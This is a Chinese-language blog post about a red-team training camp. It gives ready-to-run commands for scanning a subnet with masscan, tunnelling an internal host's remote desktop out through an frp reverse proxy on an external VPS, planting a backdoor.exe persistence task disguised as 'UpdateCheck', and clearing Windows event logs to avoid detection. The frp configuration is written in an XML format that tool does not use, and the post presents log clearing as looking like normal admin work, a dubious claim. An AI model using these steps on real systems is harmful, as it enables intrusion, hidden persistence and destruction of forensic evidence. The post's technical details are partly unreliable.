最近參加了一場攻防演練實戰(zhàn)訓練營,和一群安全愛好者一起模擬紅藍對抗。說實話,原本以為就是跑跑掃描器、丟丟payload,結(jié)果第一天就被打臉——真正攻防中,光靠現(xiàn)成工具根本走不遠。
信息收集階段:別只盯著Nmap
很多人一上來就nmap掃全端口,其實效率很低。我們小組用的是masscan先做快速發(fā)現(xiàn),再用nmap針對性深入。比如先掃出開放80、443的主機:
masscan 192.168.1.0/24 --ports 80,443 --rate=1000
拿到結(jié)果后配合httpx做標題識別,一眼就能看出哪個是后臺登錄頁,哪個是測試接口。這組合拳比單純掃IP快得多。
內(nèi)網(wǎng)滲透:代理鏈才是王道
拿下一臺邊界機后,想進內(nèi)網(wǎng)不能瞎撞。我們搭了frp反向代理,把內(nèi)網(wǎng)流量通過VPS中轉(zhuǎn)。配置文件這么寫:
<configuration>
<serverAddr>vps-ip-address</serverAddr>
<serverPort>7000</serverPort>
<localPort>3389</localPort>
<remotePort>6000</remotePort>
</configuration>
這樣從外網(wǎng)連6000端口就等于連上了內(nèi)網(wǎng)機器的遠程桌面。整個過程就像搭橋過河,一步錯步步錯。
權(quán)限維持:小工具大作用
有次好不容易提權(quán)成功,結(jié)果重啟后權(quán)限丟了。后來學會用Windows計劃任務做持久化:
schtasks /create /tn "UpdateCheck" /tr "C:\\temp\\backdoor.exe" /sc hourly /mo 1
看著不起眼,但每次系統(tǒng)檢查更新時都會悄悄拉起我們的程序。這種細節(jié)在訓練營里反復被強調(diào):攻擊不是炫技,而是讓動作自然到不被察覺。
日志清理也要講策略
剛開始總想著刪干凈,結(jié)果觸發(fā)了Wazuh告警。后來改用覆蓋方式,在目標機上執(zhí)行:
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
清空而不是刪除,行為更接近管理員維護操作。教官說,最好的隱藏是讓人覺得你從來沒出現(xiàn)過。
這場訓練營讓我明白,系統(tǒng)工具本身不決定強弱,關(guān)鍵是怎么組合使用。就像廚房里的刀,有人只能切菜,有人能雕花。真正的對抗中,拼的是對工具的理解深度,而不是誰手里的武器更酷。